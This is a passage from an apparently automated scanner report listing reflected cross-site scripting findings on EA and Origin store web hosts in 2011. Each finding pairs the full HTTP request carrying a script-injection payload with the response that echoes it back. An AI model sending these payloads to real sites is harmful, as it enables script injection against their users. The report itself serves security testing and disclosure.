User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(0x062)%3C/script%3E84252b80866=1
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=688587274.260.0000; ORA_WX_SESSION=10.2.11.49:260-0#0; JSESSIONID=D16C78DD65928965E35E73DFD8E01BF0; VISITOR_ID=971D4E8DFAED43671E5F8C17C533E4FF95647E15D19DC326

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21784804153,0)
Date: Fri, 24 Jun 2011 14:25:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app41
Content-Length: 75613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308925551009:NODE=c2a4101:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=7130d483&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&cba28--><script>alert(1)</script>988e2a37d0c=1&ceid=173716600&cename=TopHeader&id=ProductDetailsPage&productID=201797000&script>
...[SNIP]...

4.95. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69277--><script>alert(1)</script>db7d3c456c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/home/?69277--><script>alert(1)</script>db7d3c456c5=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/home/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=215059140235,0)
Date: Fri, 24 Jun 2011 14:38:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926339848:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?69277--><script>alert(1)</script>db7d3c456c5=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

4.96. http://web-static.ea.com/us/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f68b"><script>alert(1)</script>bb832b5d563 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/8f68b"><script>alert(1)</script>bb832b5d563?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30469
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:14 GMT
Date: Fri, 24 Jun 2011 14:09:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/8f68b"><script>alert(1)</script>bb832b5d563" />
...[SNIP]...

4.97. http://web-static.ea.com/us/portal/css/base/js-dependant/game_gamefeatures.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/game_gamefeatures.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e510"><script>alert(1)</script>5089f3d5a79 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/7e510"><script>alert(1)</script>5089f3d5a79?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/7e510"><script>alert(1)</script>5089f3d5a79" />
...[SNIP]...

4.98. http://web-static.ea.com/us/portal/css/base/js-dependant/hideOnLoad.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/hideOnLoad.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483be"><script>alert(1)</script>ad62f3e1566 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/483be"><script>alert(1)</script>ad62f3e1566?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/483be"><script>alert(1)</script>ad62f3e1566" />
...[SNIP]...

4.99. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-facebox.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery-facebox.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2565"><script>alert(1)</script>c7ff191df6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/a2565"><script>alert(1)</script>c7ff191df6?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30497
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/a2565"><script>alert(1)</script>c7ff191df6" />
...[SNIP]...

4.100. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-ui.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery-ui.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d142"><script>alert(1)</script>69d8b1784d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/9d142"><script>alert(1)</script>69d8b1784d3?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/9d142"><script>alert(1)</script>69d8b1784d3" />
...[SNIP]...

4.101. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.eventcalendar.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.eventcalendar.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8628d"><script>alert(1)</script>fd4414aa5ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/8628d"><script>alert(1)</script>fd4414aa5ab?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/8628d"><script>alert(1)</script>fd4414aa5ab" />
...[SNIP]...

4.102. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.pagination.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.pagination.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab03"><script>alert(1)</script>4c01e624c5d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/7ab03"><script>alert(1)</script>4c01e624c5d?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/7ab03"><script>alert(1)</script>4c01e624c5d" />
...[SNIP]...

4.103. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.slider.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.slider.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2927e"><script>alert(1)</script>b1174e8b08a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/2927e"><script>alert(1)</script>b1174e8b08a?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/2927e"><script>alert(1)</script>b1174e8b08a" />
...[SNIP]...

4.104. http://web-static.ea.com/us/portal/css/base/reset.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/reset.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a45"><script>alert(1)</script>5f2c5191043 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/a9a45"><script>alert(1)</script>5f2c5191043?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/a9a45"><script>alert(1)</script>5f2c5191043" />
...[SNIP]...

4.105. http://web-static.ea.com/us/portal/css/base/utils.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/utils.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79f2e"><script>alert(1)</script>d4820574afe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/79f2e"><script>alert(1)</script>d4820574afe?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:46 GMT
Date: Fri, 24 Jun 2011 13:43:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/79f2e"><script>alert(1)</script>d4820574afe" />
...[SNIP]...

4.106. http://web-static.ea.com/us/portal/css/ea_global_footer.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/ea_global_footer.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d055d"><script>alert(1)</script>b0f25b5562f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/d055d"><script>alert(1)</script>b0f25b5562f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30479
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/d055d"><script>alert(1)</script>b0f25b5562f" />
...[SNIP]...

4.107. http://web-static.ea.com/us/portal/css/ea_gus.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/ea_gus.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48ee"><script>alert(1)</script>3c17de4adf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/d48ee"><script>alert(1)</script>3c17de4adf6?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/d48ee"><script>alert(1)</script>3c17de4adf6" />
...[SNIP]...

4.108. http://web-static.ea.com/us/portal/css/gui.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/gui.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18290"><script>alert(1)</script>dd234103871 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/18290"><script>alert(1)</script>dd234103871?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
